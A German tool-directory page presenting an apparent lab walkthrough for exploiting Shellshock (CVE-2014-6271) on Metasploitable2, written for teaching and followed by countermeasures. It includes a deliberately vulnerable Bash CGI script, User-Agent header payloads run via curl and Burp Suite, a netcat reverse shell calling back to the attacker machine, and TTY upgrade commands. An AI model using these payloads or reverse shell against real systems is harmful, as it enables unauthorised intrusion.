Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271-Shellshock- — Ein vollständiges, modernes Demonstrationslabor für CVE-2014-6271 (Shellshock), einschließlich Architektur, Exploitationsschritten, Nutzung von Burp Suite, Reverse Shells, Gegenmaßnahmen und einer vollständigen Befehls-Cheat-Sheet. | Kitploit
Tools/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
SchwachstellenanalyseExploitationReverse EngineeringWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & BildungRed Teaming
Payload-Entwicklung
Labs & Praxis
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Ein vollständiges, modernes Demonstrationslabor für CVE-2014-6271 (Shellshock), einschließlich Architektur, Exploitationsschritten, Nutzung von Burp Suite, Reverse Shells, Gegenmaßnahmen und einer vollständigen Befehls-Cheat-Sheet.

Repository anzeigen
11vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ausnutzen von Shellshock (CVE-2014-6271): Ein vollständiges, modernes Demonstrationslabor

Shellshock (CVE-2014-6271) ist eine der einflussreichsten Schwachstellen für Remote-Codeausführung, die je entdeckt wurden. Der Fehler betrifft Bash und ermöglicht es Angreifern, beliebige Befehle auszuführen, indem sie einfach manipulierte Payloads in Umgebungsvariablen injizieren.

Diese Anleitung bietet eine vollständige, reproduzierbare Demonstration mit:

  • Kali Linux (Angreifer)
  • Metasploitable2 (Ziel)
  • curl, Burp Suite, Netcat
  • Einem manuell erstellten Bash-basierten CGI-Skript

Sie ist für Lehre, Forschung, Schulung und allgemeines Cybersicherheitsbewusstsein konzipiert.


📌 Inhaltsverzeichnis

  1. Laborarchitektur
  2. Erstellen des angreifbaren CGI-Skripts
  3. Die Shellshock-Schwachstelle verstehen
  4. Shellshock mit curl ausnutzen
  5. Shellshock mit Burp Suite ausnutzen
  6. Reverse Shell über Shellshock
  7. Upgrade auf ein voll interaktives TTY
  8. Diagramm der Angriffskette
  9. Screenshot-Galerie
  10. Gegenmaßnahmen
  11. Spickzettel (Alle Befehle)
  12. Shellshock mit Metasploit ausnutzen
  13. Fazit

1. Laborarchitektur

KomponenteRolleBetriebssystemIP-AdresseWichtige Dienste
Kali LinuxAngreiferKali Linux (neueste Version)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Angreifbarer ZielserverUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI-Skripte, Bash
Apache mod_cgiSkriptausführungLäuft auf MSF2n/aMacht Bash über CGI zugänglich
shellshock.shAngreifbarer EinstiegspunktBash-CGIn/aZeigt Umgebungsvariablen an

Dieses einfache Zwei-Knoten-Setup spiegelt viele Legacy-Bereitstellungen wider, die noch immer in industriellen und IoT-Systemen vorhanden sind.


2. Erstellen des angreifbaren CGI-Skripts

Auf Metasploitable2:

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Teste das Skript von Kali aus:

curl http://192.168.1.5/cgi-bin/shellshock.sh

Du solltest die Umgebungsvariablen angezeigt sehen.


3. Die Shellshock-Schwachstelle verstehen

Shellshock tritt auf, wenn Bash Umgebungsvariablen, die wie Funktionsdefinitionen aussehen, fehlerhaft parst.

Eine bösartige Variable wie zum Beispiel:

() { :; }; /bin/bash -c "id"

bewirkt, dass Bash den Befehl nach der Funktionsdefinition ausführt — obwohl die Funktion selbst nie aufgerufen wird.

CGI-Anwendungen sind besonders anfällig, weil HTTP-Header automatisch als Umgebungsvariablen an Skripte übergeben werden.


4. Shellshock mit curl ausnutzen

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Die Ausgabe sollte Folgendes enthalten:

Vulnerable
uid=33(www-data)

Dies bestätigt Remote-Codeausführung.


5. Shellshock mit Burp Suite ausnutzen

5.1 Normale Anfrage senden

Besuche:

http://192.168.1.5/cgi-bin/shellshock.sh

Sende die Anfrage an Repeater.

5.2 Shellshock-Payload injizieren

Ersetze den User-Agent-Header durch:

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Antwort

Du solltest Folgendes sehen:

BurpTest
uid=33(www-data)

Burp Suite bestätigt die Schwachstelle auf visuelle und lehrreiche Weise.


6. Reverse Shell über Shellshock

Starte den Listener auf Kali:

nc -lvnp 4444

Löse die Reverse Shell über das CGI-Skript aus:

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Eine Shell wird sich zurück zu Kali verbinden.


7. Upgrade auf ein voll interaktives TTY

Innerhalb der Reverse Shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Unterbreche die Sitzung:

Ctrl + Z

Auf Kali:

stty raw -echo; fg

Drücke Enter.

Du hast jetzt:

  • Tab-Vervollständigung
  • Pfeiltasten
  • Jobkontrolle
  • voll interaktive Bash

8. Diagramm der Angriffskette

          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. Screenshot-Galerie

Eine visuelle Darstellung der wichtigsten Phasen des Angriffs.

BeschreibungBild
Nmap-Scan + Shellshock-Testausgabe
Burp Suite – Erste Shellshock-Anfrage
Burp Suite – Payload-/Header-Injektion
Auf Kali empfangene Reverse Shell (nc)

10. Gegenmaßnahmen

✔ 1. Bash aktualisieren

Patche auf eine Version, die das Parsen von Funktionen korrekt behandelt.

✔ 2. CGI deaktivieren

Legacy-CGI birgt ein unnötiges systemisches Risiko.

✔ 3. HTTP-Header bereinigen

Verwerfe verdächtige Muster wie:

() { :; };

✔ 4. Prinzip der geringsten Rechte anwenden

Schränke die Berechtigungen des Webserver-Benutzers (www-data) ein.

✔ 5. Einschränkungen für ausgehende Verbindungen

Stoppt Reverse Shells und Datenexfiltration.

✔ 6. Eine Web Application Firewall (WAF) einsetzen

Moderne WAF-Signaturen erkennen Shellshock sofort.

✔ 7. SELinux / AppArmor aktivieren

Begrenzt Bash-Prozesse und blockiert unbeabsichtigtes Verhalten.

✔ 8. Regelmäßige Schwachstellenscans durchführen

Verwende Tools wie:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE (http-shellshock.nse)

Tool herunterladen